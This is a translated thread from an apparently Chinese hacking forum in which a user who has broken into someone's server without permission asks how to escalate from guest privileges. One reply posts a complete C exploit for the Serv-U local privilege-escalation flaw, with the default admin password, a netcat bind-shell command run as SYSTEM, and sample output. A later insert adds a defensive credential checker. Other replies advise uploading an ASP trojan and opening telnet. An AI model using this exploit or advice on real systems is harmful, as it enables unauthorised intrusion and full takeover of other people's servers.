Forum: Advanced Hacking    Title: Question about escalating privileges on a server
Author: lhh2003 [lhh2003]    Forum user
This afternoon I was bored, so I went after a box and got into the server successfully, but there's a problem with privileges: whatever I do I only have guest. The server has Serv-U on it, and I uploaded a privilege-escalation file, but I can't even use commands like net use to add an administrator; only things like dir work. Then I saw that PcAnywhere was installed and connected to it successfully, but that got me nowhere either... Help... depressed...

OP    Posted: 04-12-21 17:18

Reply: yizeyu [yizeyu]   Forum user
Could you teach me how you got in? Do you know which books a hacker needs to master?? Thanks

Reply 1    Posted: 04-12-21 18:49

Reply: VeryBest [x1234521]   Forum user
Didn't you just mistype the command?
NET USER, not NET USE??
What you wrote above is wrong; I wonder whether you typed it wrong during the actual attack as well `~??
Escalating privileges with Serv-U generally succeeds, as long as the version is right.~


Reply 2    Posted: 04-12-22 00:28

Reply: lhh2003 [lhh2003]   Forum user
Sorry, I mistyped above. I just checked: it's 6.0.
But I don't know why some common commands such as net start, net user, etc. won't run in the DOS prompt, while dir and copy do; it wasted a lot of my time. I opened 3389, but connecting just says the server is busy, please try again later; connecting with PcAnywhere, not even the screen shows up......555555

Reply 3    Posted: 04-12-22 01:44

Reply: amr [amr]   Forum user
Even the latest Serv-U version has a privilege escalation vulnerability; I don't think net user is what you use to escalate, though

Reply 4    Posted: 04-12-22 18:08

Reply: uncracker [uncracker]   Forum user
Is there a Serv-U 6.0?

Reply 5    Posted: 04-12-25 08:52

Reply: amr [amr]   Forum user
Serv-U local privilege escalation vulnerability (Serv-U 3.X-6.0.0.0)
http://bbs.fineacer.com/ShowPost.asp?id=1040 http://www.fineacer.com/Article_Show.asp?ArticleID=3369

Serv-U local privilege escalation vulnerability

Affected program:
Serv-U software

Description:
Serv-U local privilege escalation vulnerability

Details:
Serv-U is a very widely used FTP server for the Windows platform.

Serv-U has a design flaw that allows a local attacker to execute arbitrary commands on the system with SYSTEM privileges.

Every Serv-U installation has a default local administrator login password. This account can only connect on the local interface, so a local attacker can connect to Serv-U with it and create an FTP user that has execute rights. Once that user exists, the attacker connects to the FTP server and issues a "SITE EXEC" command, and the program is executed with SYSTEM privileges.

Affected systems:
RhinoSoft Serv-U 6.0.0.0
RhinoSoft Serv-U 5.2.0.1
RhinoSoft Serv-U 5.2.0.0
RhinoSoft Serv-U 5.0.0.9
RhinoSoft Serv-U 5.0.0.4
RhinoSoft Serv-U 5.0
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.1.0.11
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 3.0.0.20


Attack method:
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

aT4r ins4n3 (at4r@ciberdreams.com) provided the following test method:

/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004 Haxorcitos.com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date: 10/2003
* Author: Andrés Tarascó Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v6.0.0.0

G:\exploit\serv-U\local>whoami
INSANE\aT4r

G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos

<220 Serv-U FTP Server v6.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=3
220 Domain settings saved
******************************************************
[+] Domain Haxorcitos:3 Created
[+] Setting New Domain Online
<220 Server command OK
******************************************************
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>   /* also pulls in windows.h for Sleep() */
#include <io.h>
#include <process.h>

/* Build with the Winsock 2 library, e.g. cl servulocal.c ws2_32.lib */
#pragma comment(lib, "ws2_32.lib")

//Responses
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID "200-DomainID="
//Commands

#define XPLUSER "USER haxorcitos\r\n"
#define XPLPASSWORD "PASS whitex0r\r\n"
/* Hard-coded local administration account present in every affected build */
#define USER "USER LocalAdministrator\r\n"
#define PASSWORD "PASS #l@$ak#.lk;0@P\r\n"

#define MAINTENANCE "SITE MAINTENANCE\r\n"
#define EXIT "QUIT\r\n"

/* Admin-protocol block: create a throw-away domain listening on 0.0.0.0:2121 */
char newdomain[]="-SETDOMAIN\r\n"
    "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
    "-TZOEnable=0\r\n"
    " TZOKey=\r\n";
/* "-DynDNSEnable=0\r\n"
   " DynIPName=\r\n";
*/
/* Admin-protocol block: remove that domain again once the command has run */
char deldomain[]="-DELETEDOMAIN\r\n"
    "-IP=0.0.0.0\r\n"
    " PortNo=2121\r\n";

/* Admin-protocol block: FTP user in the new domain with home dir c:\ and
   "RELP" access (read, execute, list, ...) so that SITE EXEC is permitted */
char newuser[] =
    "-SETUSERSETUP\r\n"
    "-IP=0.0.0.0\r\n"
    "-PortNo=2121\r\n"
    "-User=haxorcitos\r\n"
    "-Password=whitex0r\r\n"
    "-HomeDir=c:\\\r\n"
    "-LoginMesFile=\r\n"
    "-Disable=0\r\n"
    "-RelPaths=1\r\n"
    "-NeedSecure=0\r\n"
    "-HideHidden=0\r\n"
    "-AlwaysAllowLogin=0\r\n"
    "-ChangePassword=0\r\n"
    "-QuotaEnable=0\r\n"
    "-MaxUsersLoginPerIP=-1\r\n"
    "-SpeedLimitUp=0\r\n"
    "-SpeedLimitDown=0\r\n"
    "-MaxNrUsers=-1\r\n"
    "-IdleTimeOut=600\r\n"
    "-SessionTimeOut=-1\r\n"
    "-Expire=0\r\n"
    "-RatioUp=1\r\n"
    "-RatioDown=1\r\n"
    "-RatiosCredit=0\r\n"
    "-QuotaCurrent=0\r\n"
    "-QuotaMaximum=0\r\n"
    "-Maintenance=None\r\n"
    "-PasswordType=Regular\r\n"
    "-Ratios=None\r\n"
    " Access=c:\\|RELP\r\n";

/* Serv-U's local administration listener: loopback only */
#define localport 43958
#define localip "127.0.0.1"

char cadena[1024];
int rec,domain;
/******************************************************************************/

/* Send one command (or admin block) and read replies until `response` appears.
   Captures the DomainID the server assigns when a domain is created. */
void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
                   char *response) {
    send(sock,data,strlen(data),0);
    if (ShowSend) printf(">%s",data);
    Sleep(100);
    do {
        /* leave one byte for the terminator: recv() may fill the buffer */
        rec=recv(sock,cadena,sizeof(cadena)-1,0);
        if (rec<=0) return;
        cadena[rec]='\0';
        if (showResponses) printf("<%s",cadena);
        if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
            domain=atoi(cadena+strlen(DOMAINID));
    } while (strstr(cadena,response)==NULL);
    printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
    WSADATA ws;
    int sock,sock2;

    struct sockaddr_in haxorcitos;
    struct sockaddr_in xpl;

    printf("Serv-u >3.x Local Exploit by Fineacer\r\n\r\n");
    if (argc<2) {
        printf("USAGE: ServuLocal.exe \"command\"\r\n");
        printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
        return(0);
    }

    if (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
        printf(" [-] WSAStartup() error\n");
        exit(0);
    }

    /* Step 1: log in to the admin port with the default LocalAdministrator account */
    haxorcitos.sin_family = AF_INET;
    haxorcitos.sin_port = htons(localport);
    haxorcitos.sin_addr.s_addr = inet_addr(localip);
    sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos))!=0) {
        printf(" [-] connect() to %s:%i failed: is Serv-U running locally?\n",localip,localport);
        return(1);
    }
    rec=recv(sock,cadena,sizeof(cadena)-1,0);
    if (rec<=0) return(1);
    cadena[rec]='\0';
    printf("<%s",cadena);

    ParseCommands(sock,USER,1,1,USEROK);
    ParseCommands(sock,PASSWORD,1,1,PASSOK);
    ParseCommands(sock,MAINTENANCE,1,0,"230 ");

    /* Step 2: create a domain and a user with execute rights through the admin protocol */
    printf("[+] Creating New Domain...\r\n");
    ParseCommands(sock,newdomain,0,1,BANNER);
    printf("[+] Domain Haxorcitos:%i Created\n",domain);

    /* Only for v5.x
    printf("[+] Setting New Domain Online\r\n");
    sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n Command=DomainOnline\r\n",domain);
    ParseCommands(sock,cadena,0,1,BANNER);
    */
    printf("[+] Creating Evil User\r\n");
    ParseCommands(sock,newuser,0,1,"200 ");
    Sleep(1000);

    /* Step 3: log in to the new domain as that user and run the command via SITE EXEC */
    printf("[+] Now Exploiting...\r\n");
    xpl.sin_family = AF_INET;
    xpl.sin_port = htons(2121);
    xpl.sin_addr.s_addr = inet_addr(localip);
    sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl))!=0) {
        printf(" [-] connect() to the new domain on port 2121 failed\n");
        ParseCommands(sock,deldomain,0,1,BANNER);
        return(1);
    }
    rec=recv(sock2,cadena,sizeof(cadena)-1,0);
    if (rec<=0) return(1);
    cadena[rec]='\0';
    ParseCommands(sock2,XPLUSER,1,1,USEROK);
    ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
    printf("[+] Now Executing: %s\r\n",argv[1]);
    sprintf(cadena,"site exec %s\r\n",argv[1]);
    send(sock2,cadena,strlen(cadena),0);
    shutdown(sock2,SD_BOTH);
    Sleep(100);

    /* Step 4: clean up the temporary domain and close the admin session */
    ParseCommands(sock,deldomain,0,1,BANNER);
    send(sock,EXIT,strlen(EXIT),0);
    shutdown(sock,SD_BOTH);
    closesocket(sock);
    closesocket(sock2);

    return 0;
}


Solution:

Qingchang Online (Http://Www.Fineacer.com) makes the following recommendations for this vulnerability:

1. Deny the IIS anonymous user execute permission on EXE files, as well as access to and execution of the system CMD.

2. Change the default port 43958 of the Serv-U FTP server's local administration connection, as well as its username and password.

3. Switch to other FTP server software.


Complete defense plan:

Defense plan for the Serv-U 3.X-6.0 local privilege escalation vulnerability


Vendor patch:

RhinoSoft
---------
The vendor has not yet released a patch or an upgrade; we advise users of this software to watch the vendor's homepage for the latest version:
http://www.serv-u.com/



Reply 6    Posted: 05-01-01 14:53
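The advisory above boils down to one precondition: the admin listener on 127.0.0.1:43958 still accepts the built-in LocalAdministrator credential. The script below is an added example (not part of this thread, and not code from Haxorcitos or Fineacer) for checking exactly that on a host you administer, i.e. for verifying recommendation 2. It performs only the USER/PASS step of the exchange and then sends QUIT; it never enters SITE MAINTENANCE and never creates a domain or user. The function names are mine, and FakeServU is a constructed stand-in for the admin listener so the logic can be exercised offline; the reply texts it returns are modelled on the exploit transcript above and on standard FTP codes, not on a captured Serv-U session.

```python
"""
Check whether Serv-U's local-administration listener still accepts the
default LocalAdministrator credential (the precondition for SITE EXEC abuse).
"""
import socket

# Constants taken from the exploit transcript: hard-coded admin account and port.
DEFAULT_ADMIN_USER = "LocalAdministrator"
DEFAULT_ADMIN_PASS = "#l@$ak#.lk;0@P"
DEFAULT_ADMIN_PORT = 43958


def parse_reply(line: bytes):
    """Split one FTP reply line into (code, text); code is None if malformed."""
    text = line.decode("latin-1", "replace").strip()
    if len(text) < 3 or not text[:3].isdigit():
        return None, text
    return int(text[:3]), text[3:].lstrip(" -")


def read_reply(conn, limit: int = 64 * 1024):
    """Read until the terminating 'NNN ' line of a (possibly multi-line) FTP reply."""
    buf = b""
    while len(buf) < limit:
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
        for ln in buf.split(b"\r\n")[:-1]:          # complete lines only
            if len(ln) >= 4 and ln[:3].isdigit() and ln[3:4] == b" ":
                return parse_reply(ln)
    return parse_reply(buf)


def probe_default_admin(conn) -> bool:
    """
    Try the default LocalAdministrator login on a connected admin socket.
    Returns True when the server answers 230, i.e. the credential is accepted
    and any local user could continue with SITE MAINTENANCE as in the exploit.
    """
    code, banner = read_reply(conn)
    if code != 220:
        raise RuntimeError(f"unexpected greeting: {code} {banner}")
    conn.sendall(f"USER {DEFAULT_ADMIN_USER}\r\n".encode())
    code, _ = read_reply(conn)
    if code != 331:
        conn.sendall(b"QUIT\r\n")
        return False
    conn.sendall(f"PASS {DEFAULT_ADMIN_PASS}\r\n".encode())
    code, _ = read_reply(conn)
    conn.sendall(b"QUIT\r\n")
    return code == 230


def check_host(host: str = "127.0.0.1", port: int = DEFAULT_ADMIN_PORT,
               timeout: float = 5.0) -> bool:
    """Open a real TCP connection to the admin listener and run the probe."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        return probe_default_admin(conn)


class FakeServU:
    """Constructed stand-in for the admin listener (offline demonstration only)."""

    def __init__(self, default_credential_enabled: bool = True):
        self.enabled = default_credential_enabled
        self.user = None
        self.outbox = b"220 Serv-U FTP Server v6.0 for WinSock ready...\r\n"

    def recv(self, n: int) -> bytes:
        out, self.outbox = self.outbox[:n], self.outbox[n:]
        return out

    def sendall(self, data: bytes) -> None:
        for line in data.decode("latin-1").split("\r\n"):
            if not line:
                continue
            cmd, _, arg = line.partition(" ")
            if cmd == "USER":
                self.user = arg
                reply = "331 User name okay, need password."
            elif cmd == "PASS":
                ok = (self.enabled and self.user == DEFAULT_ADMIN_USER
                      and arg == DEFAULT_ADMIN_PASS)
                reply = "230 User logged in, proceed." if ok else "530 Not logged in."
            elif cmd == "QUIT":
                reply = "221 Goodbye."
            else:
                reply = "500 Unknown command."
            self.outbox += (reply + "\r\n").encode()


if __name__ == "__main__":
    for enabled in (True, False):
        print("default credential accepted:",
              probe_default_admin(FakeServU(default_credential_enabled=enabled)))
    # On a real Serv-U host run check_host() locally: the listener is loopback-only.
```

Run check_host() on the Serv-U machine itself, since the advisory notes the admin account is reachable only on the loopback interface. A True result means the box is in the state the exploit needs; a False result only shows that this particular credential is rejected, not that the admin port has been moved or restricted, so still confirm recommendation 2 was applied in full.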

Reply: lhh2003 [lhh2003]   Forum user
I can't compile; it'd be best if someone built it for me, then I could just download it and try

Reply 7    Posted: 05-01-03 12:32

Reply: hackerjune [hackerjune]   Forum user
What is Reply 6 doing?
The OP got GUEST privileges; do you know what that means?
With Serv-U you can upload an ASP trojan
And you can also open telnet on the target
You're probably operating over IPC$`

Reply 8    Posted: 05-01-03 17:12

Reply: fbicn [fbicn]   Forum user
Better to look for material online!

Reply 9    Posted: 05-01-08 12:23

Reply: amr [amr]   Forum user
http://www.eviloctal.com/forum/read.php?fid=24&tid=4538&fpage=1&toread=1&page=2

Reply 10    Posted: 05-01-10 19:29

Reply: listenwind [listenwind]   Forum user
Heh, stay up late less and rest more; look after your health!


Reply 11    Posted: 05-01-11 02:41

Reply: lijingxi [lijingxi]   Trainee moderator
Upload a cmd of your own and change the cmd path, then see whether you can run commands!
Also, try other ways of escalating privileges, e.g. give IIS admin rights and then run the command you want.
Not being able to connect to their 3389 may be because they are filtering by IP!


Reply 12    Posted: 05-01-12 11:09

Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon

粤ICP备05087286号